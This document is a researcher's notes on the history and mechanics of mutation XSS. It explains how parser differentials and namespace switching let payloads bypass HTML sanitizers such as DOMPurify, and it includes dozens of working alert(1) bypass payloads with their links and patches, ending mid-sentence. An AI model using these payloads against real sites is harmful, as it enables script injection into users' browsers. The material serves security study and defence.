MXSS Evolution and Timeline: A primer to MXSS

2024-09-03

Note: this is a document I created while working on the MXSS video series (https://youtu.be/aczTceXp49U). It is very raw, just random thoughts collected here. If you want anything changed, feel free to open a PR.

How Do HTML Sanitizers Work?

Sanitizers are tools designed to filter harmful content from HTML, making it safe to insert into a webpage. The process involves several steps:

Parsing: The HTML content is parsed into a DOM tree on either the server or in the browser.
Sanitization: The sanitizer iterates through the DOM tree to remove dangerous or harmful content.
Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
Re-parsing: The serialized HTML is assigned to innerHTML, triggering another parsing process.
Appending to Document: The final, sanitized DOM tree is appended to the document.
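
The steps above can be sketched as a small function. This is only an illustration of the flow, not how any particular sanitizer is implemented: runSanitizerPipeline and the three stage names are hypothetical, and the stages are injected so the sketch runs outside a browser. The toy stages use a regex tokenizer purely as a stand-in for a real HTML parser.

```javascript
// Hypothetical sketch of the parse -> sanitize -> serialize flow.
// The stages are passed in, so nothing here depends on a real DOM.
function runSanitizerPipeline(dirty, { parse, sanitize, serialize }) {
  const tree = parse(dirty);         // 1. Parsing: string -> tree
  const cleanTree = sanitize(tree);  // 2. Sanitization: drop dangerous nodes
  return serialize(cleanTree);       // 3. Serialization: tree -> string
  // Steps 4 and 5 (re-parsing and appending) happen when the caller
  // assigns the returned string to element.innerHTML.
}

// Toy stages for illustration only: the "tree" is a flat array of tokens.
const toyStages = {
  parse: (html) => html.match(/<[^>]*>|[^<]+/g) || [],
  sanitize: (tokens) => tokens.filter((t) => !/^<\/?script\b/i.test(t)),
  serialize: (tokens) => tokens.join(''),
};

const clean = runSanitizerPipeline('<b>hi</b><script>alert(1)</script>', toyStages);
console.log(clean); // the script tags are gone; their text is left behind as inert text
```

In a browser, the stages could instead wrap real APIs, for example parse: (s) => new DOMParser().parseFromString(s, 'text/html') and serialize: (doc) => doc.body.innerHTML. The important point is that the string returned here is parsed one more time on insertion, and that second parse is where mutations happen.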

However, despite these steps, sanitizers—especially server-side ones—can fail due to parser differentials between server and client. A server-side sanitizer might miss dangerous content that behaves differently when parsed by a browser. A typical example is when content is treated as RAWTEXT on the server but as active HTML in the browser.

Issue with Server-Side Sanitization: HTML Parser Differentials

Server-side sanitization can introduce problems due to the differences in how HTML is parsed by the browser versus the server. Using the same parser for both sanitization and insertion is often recommended.

For example, with the sanitize-html library:

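const sanitizeHtml = require('sanitize-html');

// <style> and <svg> are added to the allow-list on purpose for this demo.
var dirty = "<svg><style><img src=x onerror=alert(1)></style>";
var clean = sanitizeHtml(dirty, {
    allowedTags: sanitizeHtml.defaults.allowedTags.concat(['style', 'svg'])
});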

In this case, sanitize-html leaves the text inside the <style> tag untouched, because in its parser <style> content is RAWTEXT and would never be rendered as markup. The browser, however, parses <style> inside an <svg> as ordinary markup rather than RAWTEXT, so the <img> becomes a real element and its onerror handler runs.

Earliest MXSS Exploit: Yosuke Hasegawa (2007)

The earliest recorded instance of Mutation XSS was discovered by Yosuke Hasegawa in 2007. The vulnerability involved Internet Explorer and its handling of the alt attribute. Hasegawa noticed that an attribute value starting with two backticks (alt="``onerror=alert(1)") caused IE to strip the surrounding quotes when it serialized the element. On the next parse, the text after the backticks was read as a separate onerror attribute, leading to XSS. This became the first documented case of Mutation XSS.

Payload:

<img src="x" alt="``onerror=alert(1)" />

Read more about this discovery on Hasegawa’s blog here.

MXSS from 2007 to 2013

Between 2007 and 2013, various researchers, including Mario Heiderich, LeverOne, and Gareth Heyes, explored and documented MXSS vulnerabilities. One notable case was Mario’s discovery in 2011 (Mozilla bug 650001), which showed how SVG content could trigger MXSS through innerHTML mutations.

Payload:

<!doctype html><svg><style>&lt;img src=x onerror=alert(1)&gt;<p>

A lot of this material was shared on the sla.ckers.org forum, and I don’t think it was called MXSS at the time: https://web.archive.org/web/20131110003021/http://sla.ckers.org/forum/list.php?2,page=1

Mario’s 2013 Paper: The InnerHTML Apocalypse

In Mario’s paper, the attacker prepares an HTML or XML string that seems safe during the first parsing. However, upon insertion into the browser’s DOM using innerHTML, the browser mutates the string unpredictably. This mutated structure can allow the execution of JavaScript even after sanitization.

In Mario’s 2013 talk at Hack in Paris titled “The InnerHTML Apocalypse”, he demonstrated how MXSS could bypass even the most well-secured applications through these mutations.

Learn more about his research here.

Read his paper: mXSS Attacks: 2013.

Gareth Heyes and MXSS (2012-2015)

Gareth Heyes was another researcher involved in MXSS research. Gareth’s tweets from that period document numerous payloads that triggered MXSS in IE:

<% a=%&gt<iframe/onload=alert(1)//> #mxss IE<=9
<%/z=%&gt<p/onresize=alert(1)//>

These tweets from 2014 here and here discuss the IE payloads and their effects.

Gareth Edge MXSS 2018 and DOMPurify Bypass

Payload:

<title>&lt/title&gt&ltimg&sol;src=&quot&quotonerror&equals;alert(1)&gt

Description:
Edge decodes the entities inside <title>, so the encoded </title> and <img> turn into real markup.

Link
http://www.thespanner.co.uk/2018/07/29/bypassing-dompurify-with-mxss/
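
To see what the decoding step produces, the title content of the payload above can be run through a toy decoder. This is a sketch for illustration only: decodePayloadEntities is a hypothetical helper that knows just the five named references used in the payload, and it does not reproduce how Edge was implemented.

```javascript
// Toy decoder for illustration only: it covers just the five named
// references that appear in the payload.
const NAMED = { lt: '<', gt: '>', quot: '"', sol: '/', equals: '=' };

function decodePayloadEntities(text) {
  // lt, gt and quot are legacy references that also decode without ';'
  // in text content; sol and equals need the trailing ';'.
  return text.replace(/&(?:(lt|gt|quot);?|(sol|equals);)/g,
    (match, legacy, strict) => NAMED[legacy || strict]);
}

const titleText = '&lt/title&gt&ltimg&sol;src=&quot&quotonerror&equals;alert(1)&gt';
console.log(decodePayloadEntities(titleText));
```

The decoded string starts with a closing </title> tag followed by an img tag carrying an onerror attribute, which is exactly the markup the sanitizer only ever saw as harmless text.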

Masato DOMPurify Closure Bypass and Google XSS Feb 2019

Description:
A document created through the browser’s DOMParser API has scripting disabled, so the content of a <noscript> tag is parsed as normal HTML: in the payload below, the <p> is an element and </noscript><img ...> is only the value of its title attribute. Once the sanitized string is inserted into a page where JavaScript is enabled, <noscript> content is treated as RAWTEXT instead, so the first </noscript> closes the element and the <img> that follows is parsed as a real tag and executes.

Google XSS Payload: Closure sanitization bypass

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Link to patch:
https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa

DOMPurify bypass payload:

> DOMPurify.sanitize("a<noscript><p id='</noscript><img src=x onerror=alert(1)>'></p></noscript>", {ADD_TAGS: ['noscript']});
< "a<noscript><p id="</noscript><img src=x onerror=alert(1)>"></p></noscript>"

Masato noembed MXSS in FF and Chrome Feb 2019

Description:
Chrome decodes HTML entities inside <noembed> tags when they are parsed by the DOMParser API.
Firefox decodes HTML entities inside <noscript> tags when they are parsed by the DOMParser API.

Payload:

> new DOMParser().parseFromString('A <noembed> B &lt;/noembed&gt; C &lt;img src=x onerror=alert(1)&gt;  D </noembed> E','text/html').body.innerHTML
< "A <noembed> B </noembed> C <img src=x onerror=alert(1)>  D </noembed> E"
A <noscript> B &lt;/noscript&gt; C &lt;img src=x onerror=alert(1)&gt; D </noscript> E

Links:
https://issues.chromium.org/issues/40090296
https://bugzilla.mozilla.org/show_bug.cgi?id=1528997

MXSS 2019 SecurityMB:

Chrome bug: https://issues.chromium.org/issues/40050167

Switch: SVG to HTML

Payload:

<svg></p><style><g title="</style><img src onerror=alert(1)>">

Description:

<svg><p> gets parsed to: <svg></svg><p></p>
However, something interesting happens if you put a closing </p> tag inside <svg>:
<svg></p> gets parsed to <svg><p></p></svg>.
So now an opening <p> sits inside <svg>, which means it will be moved out of the <svg> when the markup is serialized and parsed again.

Links:

Spec bug: https://github.com/whatwg/html/issues/5113
Chrome issue: https://issues.chromium.org/issues/40050167
Blog: https://research.securitum.com/dompurify-bypass-using-mxss/

Other variants:

<svg></p><textarea><title><style></textarea><img src=x onerror=alert(1)></style></title></svg>
or
<svg></p><textarea><desc><style></textarea><img src=x onerror=alert(1)></style></desc></svg>
<math></p><textarea><mi><style></textarea><img src=x onerror=alert(1)></mi></math>

Namespace Switching MXSS SecurityMB 2020

Payload

<form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>

Description: HTML to MathML namespace switch:

On the first parse, the second <form> ends up nested inside <mtext>, so <mglyph> and <style> are created in the HTML namespace. The img markup is therefore only text inside an HTML <style>, and DOMPurify doesn’t remove it. HTML doesn’t allow nested forms, but with a trick described in the spec it is possible to create them during the first parsing stage, so this tree is not stable: it mutates when it is serialized and parsed again.
On the second pass, the nested form is dropped and <mglyph> ends up directly below <mtext>, which switches it to the MathML namespace. The <style> element below it becomes MathML as well, so its content is parsed as markup instead of text. An img tag is not allowed in foreign content (like MathML), so it moves back to the HTML namespace and is eventually executed.

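Spec: If the adjusted current node is a MathML text integration point and the token is a start tag whose tag name is neither “mglyph” nor “malignmark”, the token is processed with the HTML content rules. A start tag named mglyph or malignmark is handled as MathML instead.
Link: https://html.spec.whatwg.org/multipage/parsing.html#tree-construction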
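
The spec rule quoted above can be modelled as a tiny decision function. This is a simplified sketch of one condition only: rulesForStartTag is a hypothetical helper, it assumes the adjusted current node is a MathML element, and it ignores the dispatcher's other conditions (HTML integration points, annotation-xml, character tokens).

```javascript
// Simplified model of ONE rule from the HTML tree-construction dispatcher.
// The element names below are the MathML text integration points.
const MATHML_TEXT_INTEGRATION_POINTS = new Set(['mi', 'mo', 'mn', 'ms', 'mtext']);

// Hypothetical helper: which rule set handles a start tag when the adjusted
// current node is the MathML element `currentMathMLTag`?
function rulesForStartTag(currentMathMLTag, startTagName) {
  const atTextIntegrationPoint = MATHML_TEXT_INTEGRATION_POINTS.has(currentMathMLTag);
  const staysMathML = startTagName === 'mglyph' || startTagName === 'malignmark';
  if (atTextIntegrationPoint && !staysMathML) {
    return 'html';   // token is processed with the HTML content rules
  }
  return 'foreign';  // token is processed with the foreign content rules
}

console.log(rulesForStartTag('mtext', 'form'));   // html
console.log(rulesForStartTag('mtext', 'mglyph')); // foreign
console.log(rulesForStartTag('mglyph', 'style')); // foreign
```

This is why the position of <mglyph> matters in the payload. While its parent is the nested HTML <form>, everything is parsed with HTML rules and <style> holds plain text. Once the form disappears and <mglyph> sits directly under <mtext>, it is created as a MathML element, and the <style> below it follows it into the MathML namespace.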

Links: https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/

Instead of style, xmp can be used:

DOMPurify.sanitize('<form><math><mtext></form><form><mglyph><xmp><img src=x onerror=alert(1)>',{ADD_TAGS:['xmp']})

Multiple variations share the same root cause, namespace confusion:

Payload:

<math><mtext><table><mglyph><style><img src=x onerror="alert(1)"></table>
or
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">

Description for why table behaves that way:

The table tag has a parsing quirk called foster parenting: children that are not allowed inside a table are moved out and inserted before it. Here mglyph, style, and img are all moved before the table.

Other variant:

<math><mtext><a title='one'><audio>aa<altglyphdef><animatecolor><filter><fieldset><a title='two'></fieldset>ccd</a>gg<mglyph><svg><mtext><style><a title='</style><img src=# onerror=alert(1)>'>

Important Points to consider from now on:

Main root cause of MXSS in client-side sanitizers, as the HTML spec puts it: It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure. Tree structures that do not roundtrip a serialize and reparse step can also be produced by the HTML parser itself, although such cases are typically non-conforming.
P(P(D)) ≠ P(D)
More generally: P^n(D) ≠ P^{n-1}(D)
Non-idempotency: repeated parsing can yield a different result after each pass. This captures the essence of mutation in the browser’s parsing.
P here is parsing (followed by serialization), D is the HTML string
Example:
D = <form><div></form><form></div></form>
P(D) = <form><div><form></form></div></form>
P(P(D)) = <form><div></div></form>
In the HTML namespace, the content of a <style> or <xmp> tag is tokenized in the RAWTEXT state, that is, as plain text. In the SVG and MathML namespaces, the content of a <style> tag is parsed as markup, so it can contain real elements.
In HTML, a <!-- inside a <style> tag is just text and does not start a comment. In SVG and MathML, it starts a real comment, which changes how the rest of the content is parsed.
HTML entities (like &amp;) inside <style> are decoded in SVG and MathML but not in HTML, potentially altering the content during parsing.
In the case of tables, the parser uses a concept called “foster parenting”, which moves unwanted or misplaced elements outside of the table and continues with the parsing, ensuring the table structure remains correct.
Inside <select>, the parser drops any child elements that are not allowed, so only valid content is retained.
While HTML does not allow nested forms, the first parsing pass can still produce them from input like <form><div></form><form></div></form>, which yields the tree <form><div><form></form></div></form>. On the next parsing pass, the inner form is dropped and the result is <form><div></div></form>. This is how browsers keep the document in line with the HTML specification: the nested form is resolved through mutation.
Refer to https://sonarsource.github.io/mxss-cheatsheet/ for more.
We have 3 main namespaces: HTML, SVG, and MathML
Switch: In the first parsing, during sanitization, our payload that executes JavaScript exists in one namespace, making it appear as safe HTML. At this stage, the payload might be within style tag text content, as an attribute value, or even as a comment, none of which are directly executable. However, during the browser’s second HTML parsing, the content shifts to another namespace. As this switch happens, the payload is transformed, causing it to move out of the text content, attribute value, or comment where it was originally contained. This allows the embedded JavaScript to eventually execute.
1. Example:
  Style tag HTML to MathML switch:
  Payload: <form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>
  Parser in sanitizer:
  The unusual form handling produces the following: <form><math><mtext><form><mglyph><style><img src=x> <- notice the nested forms
  Parser in innerHTML:
  Nested forms are not allowed, so the inner form is removed, producing the following HTML: <form><math><mtext><mglyph><style><img src=x onerror=x>
The goal is to exploit the non-idempotent nature of HTML parsing to fool sanitizers. In the first parsing, the HTML appears innocent, with potentially dangerous elements hidden in ways that the sanitizer won’t detect, such as within comments, attributes, or using namespaces like MathML or SVG. The sanitizer allows the document through, seeing it as safe. However, during the second parsing by the browser, the structure mutates—elements might shift between namespaces or become reinterpreted—revealing malicious content that can execute JavaScript or other harmful code, bypassing the initial sanitization.
Or
P(D) = D_safe <- sanitization
P(P(D)) = D_malicious <- insertion to body
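
The non-idempotency idea can be turned into a small check that keeps re-parsing a string until it stops changing. This is a sketch under assumptions: mutationChain is a hypothetical helper, and toyReparse is a stand-in that hard-codes the nested-form input D from the text together with the outputs I would expect from a spec-conforming parser, so verify them in your own browser.

```javascript
// Hypothetical helper: apply `reparse` (string -> string, i.e. parse then
// serialize) repeatedly and record every distinct intermediate result.
function mutationChain(html, reparse, maxPasses = 5) {
  const chain = [html];
  for (let i = 0; i < maxPasses; i++) {
    const previous = chain[chain.length - 1];
    const next = reparse(previous);
    if (next === previous) break; // fixed point: the markup is stable
    chain.push(next);
  }
  return chain;
}

// Stand-in for a real parser so the sketch runs anywhere. In a browser you
// could pass something like:
//   (s) => { const t = document.createElement('template'); t.innerHTML = s; return t.innerHTML; }
const TOY_RESULTS = new Map([
  ['<form><div></form><form></div></form>', '<form><div><form></form></div></form>'],
  ['<form><div><form></form></div></form>', '<form><div></div></form>'],
]);
const toyReparse = (s) => (TOY_RESULTS.has(s) ? TOY_RESULTS.get(s) : s);

const chain = mutationChain('<form><div></form><form></div></form>', toyReparse);
console.log(chain.length - 1, 'mutations before the markup became stable');
```

Raw input almost always changes on the first pass because the parser normalizes it, so the interesting question is whether a string that has already been serialized once still changes when parsed again. If it does, the sanitizer inspected a different tree than the one the page will end up with.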

Masato’s numerous bypasses when removing forbidden tags:

Description: DOMPurify removes certain tags but preserves the content inside them, which can be exploited for Mutation XSS (MXSS) through namespace switching. For example, the style tag resides inside the HTML namespace within a foreignObject element. DOMPurify removes the foreignObject tag but retains its content, causing the remaining content to switch to the SVG namespace. As a result, the malicious content that was initially safe in the HTML namespace now becomes executable as SVG tags, leading to the execution of the payload. This exploit leverages the way DOMPurify handles tag removal without completely removing the content inside.

This is a variation of the SecurityMB technique, but with a tag in between that DOMPurify removes. For example, <svg><foreignobject><p> is a valid DOM, but after sanitization it becomes <svg><p>, which is not a valid DOM, so the <p> is kicked out of the <svg> on the next parse.

So, when the content of a removed tag is kept and inserted into the body, MXSS can happen with the payloads below.

Payloads:

<svg><foreignobject><p><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>
or
<math><annotation-xml encoding="text/html"><p><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>
//<svg><p><style><p title="</style><iframe onload=alert(1)<!--"></p></style></p></svg>
DOMPurify.sanitize('<svg><title><p><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["title"]})
<svg><foreignobject><b><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>
DOMPurify.sanitize('<svg><desc><b><style><b title="</style><iframe onload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["desc"]})
DOMPurify.sanitize('<math><annotation-xml encoding="text/html"><style><img src=x onerror=alert(1)></style>',{"ADD_TAGS":['annotation-xml']})
DOMPurify.sanitize('<math><mi><b><style><b title="</style><iframe onload&#x3d;alert(1)<!--"></style>',{"FORBID_TAGS":["mi"]})
document.write(DOMPurify.sanitize("x<noframes><svg><b><xmp><b title='</xmp><img src=x onerror=alert(1)>'>",{ADD_TAGS:["xmp"]}))
<xmp><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
<noembed><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
<noframes><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
<plaintext><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
<iframe><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>

Fix by DOMPurify for the above issue:

/* Tags to ignore content of when KEEP_CONTENT is true */ // <- just remove the contents too
const FORBID_CONTENTS = addToSet({}, ['annotation-xml', 'audio', 'colgroup', 'desc', 'foreignobject', 'head', 'math', 'mi', 'mn', 'mo', 'ms', 'mtext', 'script', 'style', 'template', 'thead', 'title', 'svg', 'video']);
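
The effect of that list can be modelled with a one-line decision. This is a simplified sketch, not DOMPurify's actual source: childrenSurviveRemoval is a hypothetical helper, and the set below is only a subset of the list above.

```javascript
// Simplified model (not DOMPurify's real code) of what happens to the
// children of an element that the sanitizer has decided to remove.
const FORBID_CONTENTS = new Set(['foreignobject', 'desc', 'title', 'mi', 'style']);

function childrenSurviveRemoval(tagName, { keepContent = true, forbidContents = FORBID_CONTENTS } = {}) {
  // Children are kept only when KEEP_CONTENT is on AND the removed tag is
  // not listed in FORBID_CONTENTS.
  return keepContent && !forbidContents.has(tagName.toLowerCase());
}

console.log(childrenSurviveRemoval('foreignobject')); // false: content is dropped too
console.log(childrenSurviveRemoval('span'));          // true: content is kept
console.log(childrenSurviveRemoval('foreignobject', { forbidContents: new Set() })); // true
```

The last call models the situation before the fix (or a configuration that empties the list): <foreignobject> is removed but its <p> child is kept, which is exactly the <svg><p> shape that mutates on the next parse.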

A similar variation of Masato’s technique above in a recent version, by Kevin Mizu: restricted DOMPurify 3.0.8 bypass (2024)

Switch: Style tag HTML to SVG

Payload:

DOMPurify.sanitize(`<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">`, {
    CUSTOM_ELEMENT_HANDLING: {
        tagNameCheck: /.*/
    },
    FORBID_CONTENTS: [""]
});

Description:

The <annotation-xml> element is treated as a custom element due to the permissive custom element regex (tagNameCheck: /.*/). With FORBID_CONTENTS set to an empty array, both and within the